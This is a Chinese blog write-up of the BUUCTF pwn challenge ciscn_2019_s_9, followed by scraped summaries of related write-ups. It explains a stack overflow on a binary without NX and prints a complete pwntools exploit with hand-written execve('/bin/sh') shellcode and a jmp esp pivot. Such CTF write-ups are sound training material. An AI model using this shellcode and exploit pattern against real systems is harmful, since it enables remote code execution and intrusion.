[BUUCTF] ciscn_2019_s_9

最新推荐文章于 2025-03-23 15:56:15 发布
最新推荐文章于 2025-03-23 15:56:15 发布
阅读量340 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: shellcode刷题合集 BUUCTF_Pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zyxx_wjc/article/details/125710088
本文讲述了如何利用栈溢出漏洞和特定汇编指令在未开启NX保护的环境下,通过编写0x14字节shellcode并精确调整ESP指针,成功实现shellcode执行的过程。涉及IDA Pro分析、pwntools使用和手工汇编技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一道好玩的shellcode题,先checksec一下发现啥都没开,甚至NX也没开,目测是写在栈上的shellcode。

扔进ida里面,主要就pwn和hint两个函数比较重要,main函数直接调用了pwn,pwn函数里面有一个栈溢出漏洞。这个溢出长度不是很长,由于last ebp和返回地址在我们能填充的范围中间,pwntools自带的shellcode是写不开的(印象里是写不开的),需要我们自己去写一个shellcode。

hint函数里面是一个asm,点开汇编发现有一个jmp esp,这个就很有用。

我们自己写的shellcode长度是0x14个字节,这个长度是可以放在last ebp之前的。接下来我们可以修改返回地址为jmp esp,当这条指令的地址被弹出是,esp会下移四个字节(+4),因此我们在构造payload的时候在返回地址后面加上一个sub esp 0x28让esp指针升高指向shellcode起始处,再加上一句jmp esp执行shellcode。

0x28这个值可以由gdb中直观的数据计算得到,当然脑力够用的话也是可以静态分析出来。

shellcode的写法在我之前的博客[BUUCTF]刷题:pwnable_start_Jmp.Cliff的博客-优快云博客有所提到。

 

 之后轻易拿到shell

exp如下:

from pwn import *

context.terminal=['tmux','splitw','-h']
context.arch='i386'

r=remote('node4.buuoj.cn',26547)
#r=process('/home/wjc/Desktop/ciscn_s_9')

shellcode=asm('\
                 xor ecx,ecx;\
                 xor edx,edx;\
                 push 0x0068732f;\
                 push 0x6e69622f;\
                 mov ebx,esp;\
                 mov al,0xb;\
                 int 0x80;\
                 ')

print(hex(len(shellcode)))

jmp_esp=0x08048554

payload=shellcode.ljust(0x20,'\x00')+4*'b'+p32(jmp_esp)+asm('sub esp,0x28;jmp esp;')

#gdb.attach(r,'b*0x08048531')

r.sendline(payload)

r.interactive()

 

采用汇编手写shellcode写入栈解题ciscn_s_9
2301_81504456的博客
08-13 560
因为执行pop ebp 把esp栈顶的值给ebp,esp加4h,执行ret,即pop eip,把修改后的返回地址 0x08048554给eip,esp加4h,此时esp距离s是28h(有点昏,参考其他文章),原先的20h(s的缓冲区已经不够,需要增加8h的大小)需要扩充,利用sub esp,0x28;2.接下来主要看栈的内部分配,已知s的输入点距离ebp为20h,加上ebp的4字节大小,共需要填充24h的shellcode(大小比这小,不够填充字节),再接上ret_addr,此时还未结束。
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1140
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
[buuctf]ciscn_2019_s_9
逆向萌新的博客
07-15 1151
[buuctf]ciscn_2019_s_9
ciscn_2019_s_9
K1ose的博客
04-22 922
下载附件,file一下,是32bit程序; checksec一下; 基本没保护措施; IDA里分析一波; main()跳到pwn(); 看看pwn()的内容; 看到fgets立马想到栈溢出; 又注意到有一个hint()函数; 其内容如下: 这里直接跳到了$esp,$esp是在堆栈上的; 既然有栈溢出,栈可执行,又有一个跳转到$esp的函数,思路就很清晰了; 我们先利用栈溢出,覆盖pwn()函数的返回地址为jmp esp的地址,然后我们再使得$esp指向shellcode所在的地址,完美! 但是因为
[BUUCTF]PWN——ciscn_2019_s_9
BangSen1的博客
04-26 629
ciscn_2019_s_9 参考 例行检查 ,32位,未开启任何保护 运行一下。 32位ida载入,,第10行的fgets,能够溢出0x32-0x20-0x4个字节 没用nx保护,首先想到的就是往s里写入shellcode,然后跳转到s执行shellcode 生成的shellcode的长度过长,参数 s0x20(32) 写不下。 shellcode =''' xor eax,eax #eax置0 xor edx,edx #edx置0 push edx #将0入栈,标
BUUCTF PWN ciscn_2019_s_9
Rt1Text的博客
04-22 318
1.checksec+运行 32位/没有保护 2.32IDA进行中 1.hint函数 提示函数,很有帮助,解题关键点 直接跳到esp栈顶指针 2.pwn函数 明显的fgets()函数溢出 跟进s看看偏移 offset = 0x20+4 向s里写入shellcode 注意一点: 如果直接用pwntools生成的shellcode,会很长,s里写不下 所以这就需要我们优化shellcode的长度 shellcode =''' xor eax,eax ..
BUUCTF pwn ciscn_2019_s_3(SROP)
菜的只能随便写写博客
02-13 1689
0x01 文件分析   0x02 运行  有一个回显,并且还有多余的字符显示,接着看代码分析一下。   0x03 IDA源码  由后面的函数可以看出,这个程序使用的系统调用,并且vuln里面存在栈溢出。  在程序之中的gadgets存在着两个为rax赋值的gadget,15的系统号是rt_sigreturn,3b的系统调用是execve,利用这两个可以执行系统调用得到shell。  ex...
[BUUCTF]-PWN:ciscn_2019_es_7解析(系统调用execve,srop)
2301_79326813的博客
01-30 547
这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell。
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 6041
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
ciscn_2019_en_3
fayinq的博客
03-14 560
ciscn_2019_en_3 首先写在前面的话,这道题找到关键点之后不能说十分简单,只能说非常的简单,但是这个题还是卡了我不久时间,最开始想了半天怎么泄露出libc地址,学过的方法全是不行,血压当场up。但是看了wp一眼之后就能秒杀了,当场高血压。 函数分析: Func_init(): Func_Execute(): 这其中本来是4个函数,但是show()和edit()函数没有东西,所以命名就省略了 Func_ADD(): Func_Free(): FREE的地方很明显,他
[BUUCTF]PWN——ciscn_2019_s_9(汇编代码写shellcode)
mcmuyanga的博客
01-28 1963
ciscn_2019_s_9 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行看一下程序大概的情况 32位ida载入,第10行的fgets,能够溢出0x32-0x20-0x4个字节 由于没用nx保护,首先想到的就是往s里写入shellcode,然后跳转到s执行shellcode,s在栈上,ida里有一个函数,为我们提供了跳转到栈上的指令jmp esp 现在就一个问题,s大小只有0x20,用下面的shellcode不懂能不能完全写入 context(log_level = 'debu
BUUCTF之“ciscn_2019_s_9”见32位shellcode的简单写法,以及其中的难解之处
Probeginner的博客
12-09 330
32位简单shellcode
BUUCTF ciscn_2019_s_9
2401_85052854的博客
03-23 344
通过观察,在ret中执行的jmp esp的操作,指向的是我们最后写上“sub esp,40;call esp”这样的操作,shellcode的位置距离现在的esp为0x28,也就是40,所以要进行“sub esp,40;有个jmp esp的操作,我们可以利用这个指令直接跳转到我们从栈上写入shellcode的位置进行getshell,通过观察栈上的空间太少,pwntool生成的shellcode太长,我们只能手写短一点的shellcode了,以下是exp。checksec一下发现什么保护都没开。
ciscn_2019_s_9详解
勿山几已
06-12 521
详解pwn入门题ciscn_2019_s_9
ciscn_2019_s_9 1
weixin_74861133的博客
03-25 203
fgets处能栈溢出,然后我们发现可疑函数hint()这个函数会直接跳转到esp处执行,我们可以在栈溢出时将返回地址溢出到该函数处,到时候函数执行返回指令ret(pop eip)时esp会-4,跳转到hint函数时会jmpesp(返回地址的下一个位置),我们可以在这个位置随意构造汇编指令。所以首先我们可以在s开始的位置就将shellcode写入,手搓shellcode的长度也就32,然后通过上面的思路,构造汇编指令时可以构造sub esp,40;
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 746
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 8520
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
buuctf test_your_nc
最新发布
04-01
### BUUCTF中的网络连接测试方法 在网络渗透测试竞赛(CTF)中,`nc`(Netcat)是一个非常强大的工具,可以用于多种用途,包括端口扫描、文件传输以及简单的客户端/服务器通信。如果目标是在BUUCTF环境中测试网络连接,可以通过以下方式实现: #### 使用 `nc` 测试基本网络连通性 为了验证目标主机上的特定服务是否可用,可以利用 `nc` 命令尝试建立到该服务的连接。例如,假设需要测试 MySQL 数据库的服务状态,则可以直接通过指定 IP 地址和端口号来完成此操作[^2]。 ```bash nc <target_ip> 3306 ``` 上述命令会试图打开与 `<target_ip>` 的 TCP 连接至端口 3306 上运行的服务。如果没有收到任何错误消息或者能够进入交互模式,则说明远程机器上存在监听于该端口的服务,并允许来自当前系统的访问请求。 #### 执行简易吞吐量检测 当iperf不可用时,还可以借助组合使用`dd` 和 `nc` 来执行基础的数据传输速率测量实验[^1]。具体做法如下所示: ##### 步骤一:设置接收方 在一台计算机作为数据接受者启动 netcat 并重定向输入流保存成临时文件。 ```bash nc -lvp 12345 > received_data.bin ``` 这里 `-l` 表示开启侦听模式;`-v` 提供详细的日志输出以便观察进程详情;而最后面定义的是自选开放等待传入链接的本地端口号(此处设为12345)。 ##### 步骤二:配置发送方 另一台设备充当资料提供源角色,在那里先创建一段固定大小的内容再经由管道传递给远端地址。 ```bash dd if=/dev/zero bs=1M count=10 | nc <receiver_ip> 12345 ``` 在此处我们运用 dd 工具生成连续零字节序列模拟实际负载情况,其中参数解释分别为: - `if=/dev/zero`: 输入来源于操作系统特殊装置节点 /dev/zero ,它持续不断地供应无穷尽数量级的 NULL 字符串; - `bs=1M`: 单次读取写入缓冲区尺寸设定为每批次一百万位元组即兆比特(MB),从而加快整体流程效率减少分片次数影响统计准确性; - `count=10`: 总共重复十回前述动作构成最终提交总量大约等于十个MB规模的信息包体。 完成后可通过对比两头各自记录下的时间戳计算得出平均上传速度数值指标。 #### 加密协议分析 对于涉及SSL/TLS保护机制的目标站点而言,单独依靠常规手段可能不足以全面评估其安全性状况。此时可引入专门设计用来枚举支持算法列表并查找潜在漏洞缺陷的专业软件——Testssl.sh 。凭借它的强大功能集可以帮助参赛选手快速定位那些过期失效或是已被证明不安全的加密套件选项进而采取相应措施规避风险隐患[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值